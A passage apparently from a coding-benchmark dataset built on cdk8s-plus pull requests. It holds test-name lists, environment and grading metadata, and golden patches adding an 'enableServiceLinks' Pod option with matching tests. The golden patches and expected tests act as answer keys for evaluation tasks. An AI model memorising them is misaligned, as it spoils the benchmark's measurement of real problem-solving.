secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "can select namespaces", "can select all namespaces", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already 
used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "sidecar containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an 
unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on 
pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
No new interfaces are introduced.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 4, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved", "backport" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/5681" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue wants PVC to accept fractional Gi values; the added test creates a PVC with 512 Mi and expects the manifest to contain \"0.5Gi\". The provided golden patch changes the conversion to use SizeRoundingBehavior.NONE, which satisfies the test. Tests align with the inferred requirement and there are no unrelated test couplings or missing external info, so the task is solvable (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, 
"test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
03a72863b245715c86bea135801b5aad576c4acc
2025-05-08 08:13:44
cdk8s-team__cdk8s-plus-5711
diff --git a/src/pod.ts b/src/pod.ts index 14e4dfd2..d8d93ec2 100644 --- a/src/pod.ts +++ b/src/pod.ts @@ -22,6 +22,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, public readonly shareProcessNamespace: boolean; public readonly hostNetwork?: boolean; public readonly terminationGracePeriod?: Duration; + public readonly enableServiceLinks?: boolean; protected readonly isolate: boolean; @@ -45,6 +46,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, this.isolate = props.isolate ?? false; this.hostNetwork = props.hostNetwork ?? false; this.terminationGracePeriod = props.terminationGracePeriod ?? Duration.seconds(30); + this.enableServiceLinks = props.enableServiceLinks; if (props.containers) { props.containers.forEach(c => this.addContainer(c)); @@ -254,6 +256,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, shareProcessNamespace: this.shareProcessNamespace, hostNetwork: this.hostNetwork, terminationGracePeriodSeconds: this.terminationGracePeriod?.toSeconds(), + enableServiceLinks: this.enableServiceLinks, }; } @@ -469,6 +472,15 @@ export interface AbstractPodProps extends base.ResourceProps { * @default Duration.seconds(30) */ readonly terminationGracePeriod?: Duration; + + /** + * Indicates whether information about services should be injected into pod's + * environment variables, matching the syntax of Docker links. + * + * @default true + * @see https://kubernetes.io/docs/concepts/services-networking/connect-applications-service/#accessing-the-service + */ + readonly enableServiceLinks?: boolean; } /**
feat(pod): support `enableServiceLinks` (backport #5471) # Backport This will backport the following commits from `k8s-32/main` to `k8s-30/main`: - [feat(pod): support &#x60;enableServiceLinks&#x60; (#5471)](https://github.com/cdk8s-team/cdk8s-plus/pull/5471) <!--- Backport version: 9.5.1 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sorenlouv/backport)
**Title** Add support for the `enableServiceLinks` flag on Pods **Problem** The construct library does not expose the Kubernetes `enableServiceLinks` setting, preventing users from disabling automatic injection of service‑related environment variables into a pod. **Root Cause** The pod abstraction omits the `enableServiceLinks` property, so the field is never rendered in the pod spec. **Fix / Expected Behavior** - Provide an optional `enableServiceLinks` property on pod constructs. - Forward this value into the generated pod spec. - Default the property to `true` to retain Kubernetes’ default behavior. - Document the purpose and default of the new option. - Preserve backward compatibility for callers that do not set the flag. **Risk & Validation** - Confirm that manifests include `enableServiceLinks` only when appropriate and that the default remains unchanged. - Run the full test suite to ensure existing functionality is unaffected. - Manually validate a pod with `enableServiceLinks: false` to verify service env vars are not injected.
5,711
cdk8s-team/cdk8s-plus
diff --git a/test/pod.test.ts b/test/pod.test.ts index 17f44567..99ea4830 100644 --- a/test/pod.test.ts +++ b/test/pod.test.ts @@ -1605,3 +1605,14 @@ test('Containers should not specify "restartPolicy" field', () => { expect(() => Testing.synth(chart)).toThrowError(); }); +test('enableServiceLinks can be disabled', () => { + const chart = Testing.chart(); + new kplus.Pod(chart, 'Pod', { + containers: [{ image: 'image' }], + enableServiceLinks: false, + }); + + const spec = Testing.synth(chart)[0].spec; + expect(spec.enableServiceLinks).toBeFalsy(); +}); +
[ "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "sidecar containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "enableServiceLinks can be disabled", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", 
"can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", 
"can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
[ "Can mutate metadata", "defaultChild", "default configuration", "custom configuration", "Can be isolated", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "fromCommand", "fromHttpGet", "fromTcpSocket", "can grant permissions on imported", "defaults", "custom", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "can select namespaces", "can select all namespaces", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "small size", "can be bounded to a volume at 
instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", 
"can set publishNotReadyAddresses", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different 
protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a 
Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet 
target has replicas defined", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected 
with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - 
default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom" ]
Method: Pod.constructor(scope: Construct, id: string, props: PodProps) Location: src/pod.ts Inputs: - **scope** – the construct tree scope in which to define this pod. - **id** – logical identifier for the pod construct. - **props** – `PodProps` object; now includes an optional `enableServiceLinks?: boolean` flag. When set to `false`, the generated PodSpec will contain `enableServiceLinks: false`; defaults to `true` if omitted. Outputs: - Returns a new `Pod` construct instance. The instance’s synthesized Kubernetes manifest will include the `enableServiceLinks` field in its `spec` when the flag is provided. Description: Constructs a Kubernetes Pod resource. The new `enableServiceLinks` option lets callers control whether the pod’s environment receives automatically generated service link variables. Interface: PodProps Location: src/pod.ts (extends AbstractPodProps) Inputs: - All existing pod configuration fields (e.g., `containers`, `restartPolicy`, etc.). - **enableServiceLinks?: boolean** – optional flag controlling the `enableServiceLinks` field in the pod spec; defaults to `true` when omitted. Outputs: - Typed object passed to `Pod` constructor; the presence of `enableServiceLinks` influences the synthesized manifest. Description: Configuration object for creating a `Pod`. The newly added `enableServiceLinks` property gives callers explicit control over service‑link injection behavior for the pod. Interface: AbstractPodProps Location: src/pod.ts Inputs: - Existing abstract pod properties (e.g., `containers`, `hostNetwork`, `terminationGracePeriod`, etc.). - **enableServiceLinks?: boolean** – optional boolean mirroring the same purpose as in `PodProps`; propagated to concrete pod implementations. Outputs: - Provides the base set of properties for all pod‑like constructs. The added field is forwarded to the concrete `Pod` spec. Description: Base interface for pod‑related constructs. 
The addition of `enableServiceLinks` extends the contract to allow disabling automatic service‑link environment variables across all derived pod classes.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 12, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved", "backport" ], "llm_metadata": { "code": "B3", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": false, "B3": true, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/5471", "https://github.com/sorenlouv/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue only says to backport support for `enableServiceLinks` and points to an external PR for details, without specifying the property name or behavior. The test asserts that the synthesized pod spec includes an `enableServiceLinks` field set to false, which is not described in the issue text, indicating reliance on external information. This constitutes an external dependency (B3). 
The intent is only partially described, but the test matches the intended behavior once the property is added.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
f6104a55d40167088381d2ae543547e865051d4a
2025-05-08 08:13:47
cdk8s-team__cdk8s-plus-5712
diff --git a/src/pod.ts b/src/pod.ts index 14e4dfd2..d8d93ec2 100644 --- a/src/pod.ts +++ b/src/pod.ts @@ -22,6 +22,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, public readonly shareProcessNamespace: boolean; public readonly hostNetwork?: boolean; public readonly terminationGracePeriod?: Duration; + public readonly enableServiceLinks?: boolean; protected readonly isolate: boolean; @@ -45,6 +46,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, this.isolate = props.isolate ?? false; this.hostNetwork = props.hostNetwork ?? false; this.terminationGracePeriod = props.terminationGracePeriod ?? Duration.seconds(30); + this.enableServiceLinks = props.enableServiceLinks; if (props.containers) { props.containers.forEach(c => this.addContainer(c)); @@ -254,6 +256,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, shareProcessNamespace: this.shareProcessNamespace, hostNetwork: this.hostNetwork, terminationGracePeriodSeconds: this.terminationGracePeriod?.toSeconds(), + enableServiceLinks: this.enableServiceLinks, }; } @@ -469,6 +472,15 @@ export interface AbstractPodProps extends base.ResourceProps { * @default Duration.seconds(30) */ readonly terminationGracePeriod?: Duration; + + /** + * Indicates whether information about services should be injected into pod's + * environment variables, matching the syntax of Docker links. + * + * @default true + * @see https://kubernetes.io/docs/concepts/services-networking/connect-applications-service/#accessing-the-service + */ + readonly enableServiceLinks?: boolean; } /**
feat(pod): support `enableServiceLinks` (backport #5471) # Backport This will backport the following commits from `k8s-32/main` to `k8s-31/main`: - [feat(pod): support &#x60;enableServiceLinks&#x60; (#5471)](https://github.com/cdk8s-team/cdk8s-plus/pull/5471) <!--- Backport version: 9.5.1 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sorenlouv/backport)
**Title** Add support for configuring `enableServiceLinks` on Pods **Problem** Users cannot control whether Kubernetes injects service environment variables into Pods, limiting compatibility with workloads that rely on the default service link behavior. **Root Cause** The Pod construct did not expose the `enableServiceLinks` field from the underlying Kubernetes Pod spec, so the setting could not be customized. **Fix / Expected Behavior** - Introduce an optional `enableServiceLinks` flag in the Pod’s configuration interface. - Store the flag when a Pod is instantiated. - Propagate the flag into the generated Pod manifest under the appropriate spec field. - Document the new flag, noting its default aligns with Kubernetes (true). **Risk & Validation** - Verify that existing Pods without the flag continue to render the same manifest (default behavior unchanged). - Add tests to ensure the flag appears correctly in the rendered spec when set. - Run the full test suite to confirm no regressions in other pod features.
5,712
cdk8s-team/cdk8s-plus
diff --git a/test/pod.test.ts b/test/pod.test.ts index 17f44567..99ea4830 100644 --- a/test/pod.test.ts +++ b/test/pod.test.ts @@ -1605,3 +1605,14 @@ test('Containers should not specify "restartPolicy" field', () => { expect(() => Testing.synth(chart)).toThrowError(); }); +test('enableServiceLinks can be disabled', () => { + const chart = Testing.chart(); + new kplus.Pod(chart, 'Pod', { + containers: [{ image: 'image' }], + enableServiceLinks: false, + }); + + const spec = Testing.synth(chart)[0].spec; + expect(spec.enableServiceLinks).toBeFalsy(); +}); +
[ "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "sidecar containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "enableServiceLinks can be disabled", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", 
"can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from 